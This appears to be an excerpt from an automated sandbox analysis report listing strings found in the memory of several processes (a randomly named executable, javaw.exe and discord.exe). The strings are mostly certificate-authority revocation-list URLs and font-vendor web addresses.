Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.htmlK
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.530479660.000000000A7ED000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: uBZeAVcb6r.exe, 00000000.00000002.524157941.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 00000001.00000002.530479660.000000000A7ED000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.530479660.000000000A7ED000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
Source: javaw.exe, 00000001.00000002.530479660.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000003.279457922.00000000160FA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.538948937.0000000016111000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015671000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015650000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314148974.000000001565A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314291245.000000001566A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.comk;
Source: javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/S
Source: javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/cC
Source: javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/s
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.000000000319D000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.000000000308E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314077068.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: uBZeAVcb6r.exe, 00000000.00000003.276726649.0000000006E1F000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276834152.0000000006E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html8
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.313426968.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000003.314077068.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.538711451.0000000015707000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.525531594.000000000507C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: uBZeAVcb6r.exe, 00000000.00000003.277224524.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com3
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsF
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comalsa
Source: uBZeAVcb6r.exe, 00000000.00000003.277224524.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd9
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdic-
Source: uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comicTF
Source: uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comion
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.277511363.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comldik
Source: uBZeAVcb6r.exe, 00000000.00000003.277551803.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
Source: uBZeAVcb6r.exe, 00000000.00000003.277224524.0000000006E14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
Source: uBZeAVcb6r.exe, 00000000.00000002.531639444.0000000006E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comr
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271438822.0000000006E37000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271495223.0000000006E3A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271539327.0000000006E3A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.273153920.0000000006E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn$
Source: uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/)
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn=
Source: uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.271958382.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnX
Source: uBZeAVcb6r.exe, 00000000.00000003.271554107.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
Source: uBZeAVcb6r.exe, 00000000.00000003.271813495.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cny
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278202318.0000000006E1A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278480200.0000000006E1A000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.278715338.0000000006E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.274372956.0000000006E06000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: uBZeAVcb6r.exe, 00000000.00000003.274372956.0000000006E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-
Source: uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0$
Source: uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0esr
Source: uBZeAVcb6r.exe, 00000000.00000003.276620446.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
Source: uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-d
Source: uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d.
Source: uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/eams
Source: uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.275752177.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/I
Source: uBZeAVcb6r.exe, 00000000.00000003.276096481.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: uBZeAVcb6r.exe, 00000000.00000003.275357856.0000000006E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm
